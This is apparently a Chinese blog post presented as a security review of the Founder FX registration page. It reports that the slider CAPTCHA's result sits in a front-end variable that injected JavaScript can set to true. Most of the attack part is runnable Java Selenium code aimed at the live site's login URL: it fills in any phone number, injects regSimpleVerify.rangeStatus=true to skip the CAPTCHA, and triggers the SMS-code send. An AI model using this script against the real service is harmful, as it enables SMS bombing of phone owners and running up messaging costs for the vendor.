【方正飞翔-注册_登录安全分析报告-验证结果保存到前端变量导致安全隐患】

置顶风控牛

于 2024-08-27 14:30:00 发布

阅读量1.3k

点赞数 44

分类专栏：验证接口安全评测系列文章标签：安全前端智能手机 YOLO python chatgpt

本文链接：https://blog.csdn.net/weixin_46641057/article/details/141566663

版权

验证接口安全评测系列专栏收录该内容

150 篇文章 0 订阅

订阅专栏

前言

由于网站注册入口容易被黑客攻击，存在如下安全问题：

1. 暴力破解密码，造成用户信息泄露

2. 短信盗刷的安全问题，影响业务及导致用户投诉

3. 带来经济损失，尤其是后付费客户，风险巨大，造成亏损无底洞

一、方正飞翔PC 注册入口

简介：方正飞翔是方正在复合出版背景下开发的新一代的专业排版领域的设计软件，于2009年发布，它基于新的开放的面向对象体系，可实现高度的扩展性，支持插件功能。对Word文档的良好兼容，以及基于其自有专利的公式排版技术，方正飞翔赢得了出版人士的高度认可。
在这里插入图片描述

二、安全性分析报告：

方正飞翔研发的类似阿里的滑动条验证方式，存在严重的致命缺陷，使设计的功能无效，攻击者可以通过改变页面变量跳过这个步骤。

在这里插入图片描述

三、测试方法：

前端界面分析，这是方正飞翔自己研发的滑动验证码，网上没有现成的教学视频，但形式都差不多，发现严重问题:
前端利用滑动结果保存到前台变量 regSimpleVerify.rangeStatus，用JS 注入方式直接改变 regSimpleVerify.rangeStatus=true即可
这次还是采用模拟器的方式，简单，只需要注入JS，1步就可以搞定：

1. 注入脚本， regSimpleVerify.rangeStatus=true

1 模拟器交互部分


private static String INDEX_URL = "http://www.founderfx.cn/fxsso/login?_scope=1";
	
	@Override
	public RetEntity send(WebDriver driver, String areaCode, String phone) {
		RetEntity retEntity = new RetEntity();
		try {
			driver.get(INDEX_URL);
			WebElement phoneEle = driver.findElement(By.id("username_reg"));
			phoneEle.sendKeys(phone);

			String js = "regSimpleVerify.rangeStatus=true;console.log(regSimpleVerify);";
			((JavascriptExecutor) driver).executeScript(js);
			WebElement sendElement = driver.findElement(By.id("btnSend"));
			sendElement.click();
			Thread.sleep(1000);
			WebElement alertElement = driver.findElement(By.id("layui-layer1"));

			if (alertElement != null && alertElement.isDisplayed()) {
				String alertInfo = alertElement.findElement(By.className("layui-layer-content")).getText();
				retEntity.setMsg(alertInfo);
				return retEntity;
			}
			String gtInfo = sendElement.getAttribute("value");
			retEntity.setMsg(gtInfo);
			if (gtInfo != null && gtInfo.contains("后重新发送")) {
				retEntity.setRet(0);
			} else {
				System.out.println("gtInfo=" + gtInfo);
			}
		} catch (Exception e) {
			System.out.println(e.toString());
			retEntity.setRet(-1);
			retEntity.setMsg(e.toString());
		} finally {
			driver.manage().deleteAllCookies();
		}
		return retEntity;
	}

  由于碰到严重设计缺陷，本次测评非常简单

二丶结语

方正飞翔是方正电子旗下的专业排版领域的设计软件，作为老牌软件厂商，技术实力雄厚，但本次测评时，存在将验证结果保存在前端变量中，这就明白的告诉攻击者，答案已经给你了，不需要进行滑动验证。最终如皇帝的新装，等于没有。总之作为实力雄厚的软件公司，出现这么严重的低级问题！在业界面前被打脸，对不起自己的在出版行业的巨头地位！

很多人在短信服务刚开始建设的阶段，可能不会在安全方面考虑太多，理由有很多。
比如：“ 需求这么赶，当然是先实现功能啊 ”，“ 业务量很小啦，系统就这么点人用，不怕的 ” ， “ 我们怎么会被盯上呢，不可能的 ”等等。

有一些理由虽然有道理，但是该来的总是会来的。前期欠下来的债，总是要还的。越早还，问题就越小，损失就越低。

所以大家在安全方面还是要重视。（血淋淋的栗子！）#安全短信#

戳这里→康康你手机号在过多少网站注册过！！！

谷歌图形验证码在AI 面前已经形同虚设，所以谷歌宣布退出验证码服务，那么当所有的图形验证码都被破解时，大家又该如何做好防御呢？